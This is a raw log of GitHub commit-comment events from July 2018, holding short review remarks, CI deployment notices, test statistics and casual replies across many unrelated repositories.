{"id":"7913444854","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583217,"position":null,"line":null,"path":null,"commit_id":"12ada293e47fdb9fe9d946f01bced2a10f9aacc4","created_at":"2018-07-03T15:45:48Z","updated_at":"2018-07-03T15:45:48Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-03T15:45:48Z"}
{"id":"7913447880","type":"CommitCommentEvent","actor":{"login":"CDMR"},"repo":{"name":"JTryM/Venture-Capital"},"payload":{"comment":{"id":29583233,"position":null,"line":null,"path":null,"commit_id":"ba39959c4feb0b7e89cb28fbb4aae7b53f648c7a","created_at":"2018-07-03T15:46:17Z","updated_at":"2018-07-03T15:46:17Z","author_association":"MEMBER","body":"<DOCTYPE html>\r\n<html>\r\n<header>\r\n</header>\r\n<body>\r\n</body>\r\n</html>"}},"created_at":"2018-07-03T15:46:17Z"}
{"id":"7913448408","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583236,"position":null,"line":null,"path":null,"commit_id":"12fccbc5a228a61bade3b1b33b1ad8ecd6bb920a","created_at":"2018-07-03T15:46:22Z","updated_at":"2018-07-03T15:46:22Z","author_association":"NONE","body":"? did you change \"see\" to \"ees\" here?"}},"created_at":"2018-07-03T15:46:22Z"}
{"id":"7913448632","type":"CommitCommentEvent","actor":{"login":"cgreene"},"repo":{"name":"greenelab/czi-hca-report"},"payload":{"comment":{"id":29583237,"position":5,"line":129,"path":"content/03.aim1.md","commit_id":"552aa46e88bdda1c529da6b3a14aa38805ba272a","created_at":"2018-07-03T15:46:24Z","updated_at":"2018-07-03T15:46:24Z","author_association":"MEMBER","body":"Maybe a quick description of what data augmentation is + some context about why it might be useful. Also, do you need a blank line after the header for formatting?"}},"created_at":"2018-07-03T15:46:24Z"}
{"id":"7913449841","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583240,"position":null,"line":null,"path":null,"commit_id":"9a7ed07887bac0a34c566b4ea574e89611d5ed68","created_at":"2018-07-03T15:46:37Z","updated_at":"2018-07-03T15:46:37Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-03T15:46:37Z"}
{"id":"7913450115","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29583241,"position":null,"line":null,"path":null,"commit_id":"3712658e8497d9184e1e749df281843a1cea388c","created_at":"2018-07-03T15:46:40Z","updated_at":"2018-07-03T15:46:40Z","author_association":"OWNER","body":"LLR: 0.83 (-2.94,2.94) [0.00,5.00]\r\nTotal: 1408 W: 358 L: 313 D: 737"}},"created_at":"2018-07-03T15:46:40Z"}
{"id":"7913452357","type":"CommitCommentEvent","actor":{"login":"CDMR"},"repo":{"name":"JTryM/Venture-Capital"},"payload":{"comment":{"id":29583244,"position":null,"line":null,"path":null,"commit_id":"ba39959c4feb0b7e89cb28fbb4aae7b53f648c7a","created_at":"2018-07-03T15:47:03Z","updated_at":"2018-07-03T15:47:03Z","author_association":"MEMBER","body":"Basic, Basic error HTML"}},"created_at":"2018-07-03T15:47:03Z"}
{"id":"7913456499","type":"CommitCommentEvent","actor":{"login":"cgreene"},"repo":{"name":"greenelab/czi-hca-report"},"payload":{"comment":{"id":29583252,"position":6,"line":130,"path":"content/03.aim1.md","commit_id":"552aa46e88bdda1c529da6b3a14aa38805ba272a","created_at":"2018-07-03T15:47:44Z","updated_at":"2018-07-03T15:47:44Z","author_association":"MEMBER","body":"`down sampled`. Also, do you want to note that you did this for very small numbers of cells in part b/c that's where data augmentation was expected to be most fruitful?"}},"created_at":"2018-07-03T15:47:44Z"}
{"id":"7913458080","type":"CommitCommentEvent","actor":{"login":"ngph1"},"repo":{"name":"ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609"},"payload":{"comment":{"id":29583255,"position":null,"line":null,"path":null,"commit_id":"5e403e7f0409adee1eef3c092ba9a8b2c1bb0a66","created_at":"2018-07-03T15:48:01Z","updated_at":"2018-07-03T15:48:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ada15128-1189-488e-a2d8-e35d9e878577?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702091319609\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fc2b99ed-f195-4a70-9b20-62316c9f9855?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702091319609\") deployed [sample-cloud-native-toolchain-tutorial-20180702091319609](https://github.com/ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609/releases/tag/deploy-ibm-yp-us-south-PH-DP-Org-prod-20180703-154800 \"deploy-ibm-yp-us-south-PH-DP-Org-prod-20180703-154800\") to [prod](https://console.bluemix.net/apps/1540de09-db42-4142-b733-77ae19e3b72f?env_id=ibm:yp:us-south \"ibm:yp:us-south:PH DP Org:prod\"), including this commit"}},"created_at":"2018-07-03T15:48:01Z"}
{"id":"7913458719","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583256,"position":null,"line":null,"path":null,"commit_id":"6a654c9f1e782f7c1d6463a5bd3057ccd523bbaa","created_at":"2018-07-03T15:48:08Z","updated_at":"2018-07-03T15:48:08Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-03T15:48:08Z"}
{"id":"7913458934","type":"CommitCommentEvent","actor":{"login":"jaimeniswonger"},"repo":{"name":"OWASP/sonarqube"},"payload":{"comment":{"id":29583257,"position":null,"line":null,"path":null,"commit_id":"d8670826b3ab839bb4a82ae283963ae81ad398e8","created_at":"2018-07-03T15:48:10Z","updated_at":"2018-07-03T15:48:10Z","author_association":"CONTRIBUTOR","body":"Did you intentionally remove the sonarqube user?  We added that in commit 2cc13c2733a96202fb7de071963efa5e8c4221f9 to run on OpenShift (as non root).\r\n\r\nAlso, it would be nice if you would create some tags on the images pushed to DockerHub so that the \"latest\" isn't the only option.  Using only \"latest\" causes users of this image to break when things change, and we have no option to use a stable tag.\r\n\r\nThanks!"}},"created_at":"2018-07-03T15:48:10Z"}
{"id":"7913459838","type":"CommitCommentEvent","actor":{"login":"cgreene"},"repo":{"name":"greenelab/czi-hca-report"},"payload":{"comment":{"id":29583259,"position":7,"line":131,"path":"content/03.aim1.md","commit_id":"552aa46e88bdda1c529da6b3a14aa38805ba272a","created_at":"2018-07-03T15:48:18Z","updated_at":"2018-07-03T15:48:18Z","author_association":"MEMBER","body":"New line w/ the sentence break. Also, that looks like the `kallisto` reference stuck in there. What version/parameters did you use for `Salmon`?"}},"created_at":"2018-07-03T15:48:18Z"}
{"id":"7913465170","type":"CommitCommentEvent","actor":{"login":"sameb"},"repo":{"name":"cglib/cglib"},"payload":{"comment":{"id":29583267,"position":null,"line":null,"path":null,"commit_id":"e31ca2f1e514b2db3f017b1534b2271439bd0d3b","created_at":"2018-07-03T15:49:12Z","updated_at":"2018-07-03T15:49:12Z","author_association":"CONTRIBUTOR","body":"Yes. I released it, so however long it takes Maven to update.\n\nOn Tue, Jul 3, 2018, 11:35 AM Johno Crawford <notifications@github.com>\nwrote:\n\n> @sameb <https://github.com/sameb> 3.2.7 coming to central Maven soon?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cglib/cglib/commit/e31ca2f1e514b2db3f017b1534b2271439bd0d3b#commitcomment-29583072>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACC7EjhMi9CAhyetcO-yAt8PUUwKc57kks5uC49KgaJpZM4VBLlN>\n> .\n>\n"}},"created_at":"2018-07-03T15:49:12Z"}
{"id":"7913466120","type":"CommitCommentEvent","actor":{"login":"narwy"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":29583270,"position":null,"line":null,"path":null,"commit_id":"a14e62325cbe82a615ccd2e80925c75cb0bf1eaf","created_at":"2018-07-03T15:49:21Z","updated_at":"2018-07-03T15:49:21Z","author_association":"NONE","body":"@Chigozie391 redirect()->to('https://www.google.com')->send();"}},"created_at":"2018-07-03T15:49:21Z"}
{"id":"7913467501","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583273,"position":null,"line":null,"path":null,"commit_id":"78c1c6d7b8dabf16b944d71030038cd52b206e55","created_at":"2018-07-03T15:49:37Z","updated_at":"2018-07-03T15:49:37Z","author_association":"NONE","body":"very nice! I like it that you see all these errors!"}},"created_at":"2018-07-03T15:49:37Z"}
{"id":"7913474677","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29583279,"position":null,"line":null,"path":null,"commit_id":"bbba4732a4dab258d083c840990ffa0a9e823f8a","created_at":"2018-07-03T15:50:52Z","updated_at":"2018-07-03T15:50:52Z","author_association":"COLLABORATOR","body":"ah- good catch "}},"created_at":"2018-07-03T15:50:52Z"}
{"id":"7913478461","type":"CommitCommentEvent","actor":{"login":"caitlinbestler"},"repo":{"name":"nexentaedge/nexentaedge.github.io"},"payload":{"comment":{"id":29583286,"position":null,"line":null,"path":null,"commit_id":"5028317ca32103af88895311d099db4e6a88ef77","created_at":"2018-07-03T15:51:34Z","updated_at":"2018-07-03T15:51:34Z","author_association":"COLLABORATOR","body":"Making exports visible across tenants is undesirable, but acceptable as long as there is no cross-tenant *access* to the exports.\r\n"}},"created_at":"2018-07-03T15:51:34Z"}
{"id":"7913480243","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"keszybz/systemd"},"payload":{"comment":{"id":29583290,"position":null,"line":null,"path":null,"commit_id":"b105ff6572ee4c993e4fb8cf23f4f239614b160d","created_at":"2018-07-03T15:51:53Z","updated_at":"2018-07-03T15:51:53Z","author_association":"NONE","body":":thumbsup:"}},"created_at":"2018-07-03T15:51:53Z"}
{"id":"7913481477","type":"CommitCommentEvent","actor":{"login":"zhurenjin"},"repo":{"name":"zhurenjin/Self-introduction"},"payload":{"comment":{"id":29583291,"position":null,"line":null,"path":null,"commit_id":"d35ddbce464bbdcf5c86044525449f9baf4566e7","created_at":"2018-07-03T15:52:07Z","updated_at":"2018-07-03T15:52:07Z","author_association":"OWNER","body":"撒地方"}},"created_at":"2018-07-03T15:52:07Z"}
{"id":"7913481657","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29583292,"position":23,"line":190,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-03T15:52:10Z","updated_at":"2018-07-03T15:52:10Z","author_association":"OWNER","body":"@ms2sato 一応やってみたのですが、確認お願いします。\r\nindexを増やすことになっていますか？"}},"created_at":"2018-07-03T15:52:10Z"}
{"id":"7913489959","type":"CommitCommentEvent","actor":{"login":"djtfmartin"},"repo":{"name":"AtlasOfLivingAustralia/biocache-service"},"payload":{"comment":{"id":29583305,"position":null,"line":null,"path":null,"commit_id":"a211f3da33119ea1e566291bc5ed9033ef787788","created_at":"2018-07-03T15:53:35Z","updated_at":"2018-07-03T15:53:35Z","author_association":"CONTRIBUTOR","body":"i think its intentional that sensitive_latitude, sensitive_longitude are not in indexFieldMaps.\r\nIs this causing a problem elsewhere ?"}},"created_at":"2018-07-03T15:53:35Z"}
{"id":"7913493005","type":"CommitCommentEvent","actor":{"login":"bleggett"},"repo":{"name":"tmobile/jazz-installer"},"payload":{"comment":{"id":29583308,"position":85,"line":124,"path":"installscripts/cookbooks/jenkins/recipes/configurejenkins.rb","commit_id":"9dd37ae52cedcee36f849724f8db8c75a7e4d32e","created_at":"2018-07-03T15:54:07Z","updated_at":"2018-07-03T15:54:07Z","author_association":"MEMBER","body":"Re-running..you mean running 2X against the same jenkins instance? Scenario 1?"}},"created_at":"2018-07-03T15:54:07Z"}
{"id":"7913496070","type":"CommitCommentEvent","actor":{"login":"mkht"},"repo":{"name":"mkht/DSCR_IniFile"},"payload":{"comment":{"id":29583321,"position":null,"line":null,"path":null,"commit_id":"54420a9aa45403a0b8252517c937f362172bf39c","created_at":"2018-07-03T15:54:38Z","updated_at":"2018-07-03T15:54:38Z","author_association":"OWNER","body":"致命的なバグ #1 が見つかったのでv1.1.0のリリースは先送り"}},"created_at":"2018-07-03T15:54:38Z"}
{"id":"7913496500","type":"CommitCommentEvent","actor":{"login":"lazerl0rd"},"repo":{"name":"celtare21/android_device_leeco_x2_personal"},"payload":{"comment":{"id":29583322,"position":null,"line":null,"path":null,"commit_id":"fde7f852c89b623dba9881c24214e38a8cdd9bef","created_at":"2018-07-03T15:54:42Z","updated_at":"2018-07-03T15:54:42Z","author_association":"NONE","body":"what is MMC doing there lol"}},"created_at":"2018-07-03T15:54:42Z"}
{"id":"7913499664","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29583329,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T15:55:15Z","updated_at":"2018-07-03T15:55:15Z","author_association":"CONTRIBUTOR","body":"Yes, it will still be in our logs. *IF* someone sets up CI for a fork of this repo, which I think is unlikely."}},"created_at":"2018-07-03T15:55:15Z"}
{"id":"7913500615","type":"CommitCommentEvent","actor":{"login":"beliqqstreb"},"repo":{"name":"beliqqstreb/0x05072b7049f30d3c55791b97fa234c307178a8de"},"payload":{"comment":{"id":29583333,"position":null,"line":null,"path":null,"commit_id":"890190c278193318fc7d454e969c048af4154614","created_at":"2018-07-03T15:55:25Z","updated_at":"2018-07-03T15:55:25Z","author_association":"OWNER","body":"This utility can work with Claymore's Ethereum Dual miner v4.3 or higher.\r\n\r\nFeatures:\r\n\r\n- Remote monitoring: hashrates, GPUs temperature, fan speeds, current pool names, etc.\r\n- Remote management: restart miners, apply \"epools.txt\", \"dpools.txt\" and \"config.txt\" files.\r\n- Simple webserver.\r\n\r\n\r\nNotes:\r\n\r\n- You can send same file to several miners at once. \r\n  Before sending a file, all strings %NAME% will be replaced with miner names.\r\n  For example, you send epools.txt which contains this line:\r\n      POOL: eth-eu.dwarfpool.com:8008, WALLET: 0xD69af2A796A737A103F12d2f0BCC563a13900E6F/%NAME%, PSW: x\r\n  Every miner will get own epools.txt with their names, for example:\r\n     POOL: eth-eu.dwarfpool.com:8008, WALLET: 0xD69af2A796A737A103F12d2f0BCC563a13900E6F/Rig1, PSW: x\r\n \r\n\r\nQuick start guide:\r\n\r\n1. Press \"Add Miner\" button, specify miner IP and port for remote management (default is 3333).\r\n2. Add all your miners in the same way.\r\n3. You can see statistics now and manage miners remotely.\r\n4. In miner properties you can specify hashrate of miner and warning temperature, \r\n    manager will warn you if something goes wrong.\r\n\r\n\r\n\r\nTable columns help:\r\n\r\n\"Name\" - miner name.\r\n\"IP:port\" - miner IP and port for remote management.\r\n\"Running time\" - miner running time, also number of miner restarts.\r\n\"Ethereum Stats\" - current miner speed for Ethereum, number of accepted shares, \r\nnumber of rejected shares, number of incorrectly calculated shares, rejected/accepted ratio.\r\n\"Decred Stats: - same statistics for Decred.\r\n\"GPU Temperature\" - GPU temperatures and fans speed.\r\n\"Pool\" - current Ethereum and Decred pools, number of failovers.\r\n\"Version\" - miner version.\r\n\"Comments\" - miner comments that you can set in the miner properties dialog.\r\n"}},"created_at":"2018-07-03T15:55:25Z"}
{"id":"7913500799","type":"CommitCommentEvent","actor":{"login":"githubchenshihua"},"repo":{"name":"githubchenshihua/hello-world"},"payload":{"comment":{"id":29583334,"position":null,"line":null,"path":null,"commit_id":"a7e08c8abfa0d79b00f3b63733c5bc8e6e456a14","created_at":"2018-07-03T15:55:27Z","updated_at":"2018-07-03T15:55:27Z","author_association":"OWNER","body":"leave readme"}},"created_at":"2018-07-03T15:55:27Z"}
{"id":"7913502294","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"cplusplus/draft"},"payload":{"comment":{"id":29583337,"position":33,"line":1979,"path":"source/expressions.tex","commit_id":"fa323da9d0896fce007d70b5445d99bf3298027f","created_at":"2018-07-03T15:55:43Z","updated_at":"2018-07-03T15:55:43Z","author_association":"CONTRIBUTOR","body":"This phrasing suggests that `C` is the *concept-name* at the end of the *qualified-concept-name*, rather than the entire qualified name as intended. Maybe \"...that ends with a *concept-name*, then `C<decltype((E))>` shall be satisfied, where \\tcode{C} is the denoted concept.\"?"}},"created_at":"2018-07-03T15:55:43Z"}
{"id":"7913505470","type":"CommitCommentEvent","actor":{"login":"TkNm"},"repo":{"name":"flickbits12/kawaii_face_p"},"payload":{"comment":{"id":29583343,"position":4,"line":19,"path":"RJP_7_1/RJP_7_1/Face.cpp","commit_id":"9da8dfe0bd9e34a045eae520aa769e366c414a96","created_at":"2018-07-03T15:56:14Z","updated_at":"2018-07-03T15:56:14Z","author_association":"COLLABORATOR","body":"このコードクサイ"}},"created_at":"2018-07-03T15:56:14Z"}
{"id":"7913507873","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"cglib/cglib"},"payload":{"comment":{"id":29583347,"position":null,"line":null,"path":null,"commit_id":"e31ca2f1e514b2db3f017b1534b2271439bd0d3b","created_at":"2018-07-03T15:56:38Z","updated_at":"2018-07-03T15:56:38Z","author_association":"NONE","body":"Cheers!"}},"created_at":"2018-07-03T15:56:38Z"}
{"id":"7913508390","type":"CommitCommentEvent","actor":{"login":"onlyjob"},"repo":{"name":"ZoneMinder/zoneminder"},"payload":{"comment":{"id":29583349,"position":null,"line":null,"path":null,"commit_id":"c284078db66c25bd6b9d0fd68970f23b170a6ae9","created_at":"2018-07-03T15:56:43Z","updated_at":"2018-07-03T15:56:43Z","author_association":"CONTRIBUTOR","body":"Hmm, it is rather ugly and sloppy to update versioned files in-place...\r\n\r\nIn https://github.com/ZoneMinder/zoneminder/tree/master/web/skins/classic/js we have an elegant example where generic `jquery.js` symlink is pointing to a versioned file to simplify upgrades...\r\n"}},"created_at":"2018-07-03T15:56:43Z"}
{"id":"7913508968","type":"CommitCommentEvent","actor":{"login":"flickbits12"},"repo":{"name":"flickbits12/kawaii_face_p"},"payload":{"comment":{"id":29583351,"position":4,"line":19,"path":"RJP_7_1/RJP_7_1/Face.cpp","commit_id":"9da8dfe0bd9e34a045eae520aa769e366c414a96","created_at":"2018-07-03T15:56:49Z","updated_at":"2018-07-03T15:56:49Z","author_association":"OWNER","body":"💩 \r\n"}},"created_at":"2018-07-03T15:56:49Z"}
{"id":"7913511447","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"akoumjian/b9labs-remittance"},"payload":{"comment":{"id":29583356,"position":28,"line":56,"path":"contracts/Remittance.sol","commit_id":"795839d720f8e857702664ba9810290dad2c66d4","created_at":"2018-07-03T15:57:16Z","updated_at":"2018-07-03T15:57:16Z","author_association":"NONE","body":"I would have made the revoke possible after a deadline. It works like you did too. I suppose, Carol will just wait for more block confirmations before giving the $ to Bob."}},"created_at":"2018-07-03T15:57:16Z"}
{"id":"7913512879","type":"CommitCommentEvent","actor":{"login":"roelandg"},"repo":{"name":"sjonkeesse/rtl-sdr"},"payload":{"comment":{"id":29583359,"position":null,"line":null,"path":null,"commit_id":"7d3d5190c01e2be3b25dab28306a51a8083e7895","created_at":"2018-07-03T15:57:31Z","updated_at":"2018-07-03T15:57:31Z","author_association":"NONE","body":"Hi, heeft dit betrekking op het multi threaded maken van de rtl-sdr implementatie m.b.t. de discussie op het FS forum? Was ook even benieuwd of je de voor jou de best werkende args zou kunnen delen? Zelf lijkt het me interessant om een Android implementatie te maken, aangezien de RTL-SDR stick op android ook werkt. Mogelijk iets gebruiksvriendelijker dan een script op een raspberry :-)\r\n\r\nHoor graag van je! \r\nps. kon even geen andere weg vinden om je te contacten :P"}},"created_at":"2018-07-03T15:57:31Z"}
{"id":"7913518236","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29583372,"position":5,"line":88,"path":"code/Example/Drasil/DocumentLanguage/Definitions.hs","commit_id":"38a401f50efa44e02abd306bf2c8b7f28b776c56","created_at":"2018-07-03T15:58:24Z","updated_at":"2018-07-03T15:58:24Z","author_association":"COLLABORATOR","body":"Done in b10023c."}},"created_at":"2018-07-03T15:58:24Z"}
{"id":"7913520382","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29583383,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T15:58:46Z","updated_at":"2018-07-03T15:58:46Z","author_association":"NONE","body":"> Your dmesg is from build 5.42, right?\r\n\r\nYes, from a master branch, unchanged."}},"created_at":"2018-07-03T15:58:46Z"}
{"id":"7913523533","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29583390,"position":null,"line":null,"path":null,"commit_id":"292ff84e2253d77efaff906151dde786709eab39","created_at":"2018-07-03T15:59:18Z","updated_at":"2018-07-03T15:59:18Z","author_association":"NONE","body":"BTW, another good game to test the performance of the OIT renderer is Rez. It is very fillrate heavy, full of alpha effects, and it requires me to lower the resolution considerably before I no longer get frame drops with it."}},"created_at":"2018-07-03T15:59:18Z"}
{"id":"7913526556","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29583395,"position":null,"line":null,"path":null,"commit_id":"b5f2c341bd58d9e5ccf3aef789731acde8c4aba3","created_at":"2018-07-03T15:59:49Z","updated_at":"2018-07-03T15:59:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-670](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-670).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-670-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T15:59:49Z"}
{"id":"7913527438","type":"CommitCommentEvent","actor":{"login":"web-padawan"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":29583400,"position":null,"line":null,"path":null,"commit_id":"fd416a212ed725eef26d3b29bb624ed66669ad76","created_at":"2018-07-03T15:59:59Z","updated_at":"2018-07-03T15:59:59Z","author_association":"CONTRIBUTOR","body":"🙈 this should have been done in 3.0.0 release, not in 3.0.2 though"}},"created_at":"2018-07-03T15:59:59Z"}
{"id":"7913528355","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29583403,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-03T16:00:10Z","updated_at":"2018-07-03T16:00:10Z","author_association":"NONE","body":"Did you want to schedule as [-3,1] or [0,4] instead of [0,5] ?\r\nhttp://tests.stockfishchess.org/tests/view/5b3b9ac60ebc5902b9ffc434"}},"created_at":"2018-07-03T16:00:10Z"}
{"id":"7913536944","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29583422,"position":null,"line":null,"path":null,"commit_id":"e5bf993192b1825483cb0f199b33deb8720a3ff2","created_at":"2018-07-03T16:01:32Z","updated_at":"2018-07-03T16:01:32Z","author_association":"NONE","body":"Did you intend [0,4] instead of [0,5] ?"}},"created_at":"2018-07-03T16:01:32Z"}
{"id":"7913540971","type":"CommitCommentEvent","actor":{"login":"lcawl"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29583433,"position":39,"line":208,"path":"x-pack/docs/en/rest-api/ml/jobcounts.asciidoc","commit_id":"f9804dca36d28db9dfe7bc3437675258e1724fda","created_at":"2018-07-03T16:02:12Z","updated_at":"2018-07-03T16:02:12Z","author_association":"CONTRIBUTOR","body":"I'd add an \"and\" after records"}},"created_at":"2018-07-03T16:02:12Z"}
{"id":"7913541904","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29583438,"position":null,"line":null,"path":null,"commit_id":"e5bf993192b1825483cb0f199b33deb8720a3ff2","created_at":"2018-07-03T16:02:22Z","updated_at":"2018-07-03T16:02:22Z","author_association":"OWNER","body":"No I want to use [0, 5]...\r\nThanks!"}},"created_at":"2018-07-03T16:02:22Z"}
{"id":"7913544395","type":"CommitCommentEvent","actor":{"login":"frogg"},"repo":{"name":"OasysFoundation/Oasys-Toolbox-React"},"payload":{"comment":{"id":29583444,"position":6,"line":12,"path":"src/GameEmbedder.js","commit_id":"6c26c3eecad4d4902817a6b33d243c8371009df3","created_at":"2018-07-03T16:02:47Z","updated_at":"2018-07-03T16:02:47Z","author_association":"MEMBER","body":"why do we need geolocation?"}},"created_at":"2018-07-03T16:02:47Z"}
{"id":"7913547375","type":"CommitCommentEvent","actor":{"login":"lcawl"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29583451,"position":31,"line":200,"path":"x-pack/docs/en/rest-api/ml/jobcounts.asciidoc","commit_id":"f9804dca36d28db9dfe7bc3437675258e1724fda","created_at":"2018-07-03T16:03:18Z","updated_at":"2018-07-03T16:03:18Z","author_association":"CONTRIBUTOR","body":"Are the titles \"min\", \"max\", and \"avg\" used in the output?  If not (and maybe even if so), I'd suggest spelling out their meaning. "}},"created_at":"2018-07-03T16:03:18Z"}
{"id":"7913550172","type":"CommitCommentEvent","actor":{"login":"TASCer"},"repo":{"name":"TASCer/hello-world"},"payload":{"comment":{"id":29583465,"position":null,"line":null,"path":null,"commit_id":"c29abfadc56094b158dba4ec8ab5f4f241f42cd0","created_at":"2018-07-03T16:03:49Z","updated_at":"2018-07-03T16:03:49Z","author_association":"OWNER","body":"cxvfbv"}},"created_at":"2018-07-03T16:03:49Z"}
{"id":"7913550567","type":"CommitCommentEvent","actor":{"login":"iseulde"},"repo":{"name":"WordPress/gutenberg"},"payload":{"comment":{"id":29583466,"position":24,"line":845,"path":"editor/components/rich-text/index.js","commit_id":"320c96e7108fbc6fd1e536656ee2304ae32ece49","created_at":"2018-07-03T16:03:53Z","updated_at":"2018-07-03T16:03:53Z","author_association":"MEMBER","body":"I usually add something like `const { warn, log, error, ... } = window.console` to browser dependencies to avoid the `eslint` comment and be explicit. Up to you though :)"}},"created_at":"2018-07-03T16:03:53Z"}
{"id":"7913553051","type":"CommitCommentEvent","actor":{"login":"lcawl"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29583467,"position":25,"line":194,"path":"x-pack/docs/en/rest-api/ml/jobcounts.asciidoc","commit_id":"f9804dca36d28db9dfe7bc3437675258e1724fda","created_at":"2018-07-03T16:04:19Z","updated_at":"2018-07-03T16:04:19Z","author_association":"CONTRIBUTOR","body":"I'd add \"The number\" here too to match the description for total."}},"created_at":"2018-07-03T16:04:19Z"}
{"id":"7913557824","type":"CommitCommentEvent","actor":{"login":"kekkokk"},"repo":{"name":"lynckia/licode"},"payload":{"comment":{"id":29583478,"position":null,"line":null,"path":null,"commit_id":"59dd6b668244b6de91bb47c88c9ad9626ab9aeea","created_at":"2018-07-03T16:05:08Z","updated_at":"2018-07-03T16:05:08Z","author_association":"CONTRIBUTOR","body":"Inspecting the code seems that this: \r\n\r\n`More importantly, if the publisher is not using simulcast, the lowest `maxVideoBW` set to a subscriber will limit the max bandwidth used by that particular stream for the publisher and all the subscribers.`\r\n\r\nis not totally correct. instead seems that the last maxVideoBW passed by the last subscriber joined wins. Am I wrong?\r\n"}},"created_at":"2018-07-03T16:05:08Z"}
{"id":"7913561513","type":"CommitCommentEvent","actor":{"login":"tooky"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29583485,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T16:05:45Z","updated_at":"2018-07-03T16:05:45Z","author_association":"MEMBER","body":"Ahh, I see know the assumption I had made that I hadn't communicated.\r\n\r\nI was concerned that if someone copies this skeleton code to set up their own project they may inadvertently squirt all of their test results to Cucumber Pro. Not that they would fork this code."}},"created_at":"2018-07-03T16:05:45Z"}
{"id":"7913564064","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"susanhleung/rdkit"},"payload":{"comment":{"id":29583489,"position":12,"line":12,"path":"Code/GraphMol/MolStandardize/Charge.cpp","commit_id":"da28467f8c6ccd53e1db04be680f709f58da565a","created_at":"2018-07-03T16:06:13Z","updated_at":"2018-07-03T16:06:13Z","author_association":"NONE","body":"Nice use of C++11 features to initialize this."}},"created_at":"2018-07-03T16:06:13Z"}
{"id":"7913570733","type":"CommitCommentEvent","actor":{"login":"hamza765"},"repo":{"name":"lmcneel/stalks"},"payload":{"comment":{"id":29583497,"position":5,"line":5,"path":"README.md","commit_id":"639092a8e08bfa937a0673c4922542ed11d9351b","created_at":"2018-07-03T16:07:23Z","updated_at":"2018-07-03T16:07:23Z","author_association":"COLLABORATOR","body":"This is wrong. It was correct before. It should be `CONTRIBUTING.md`."}},"created_at":"2018-07-03T16:07:23Z"}
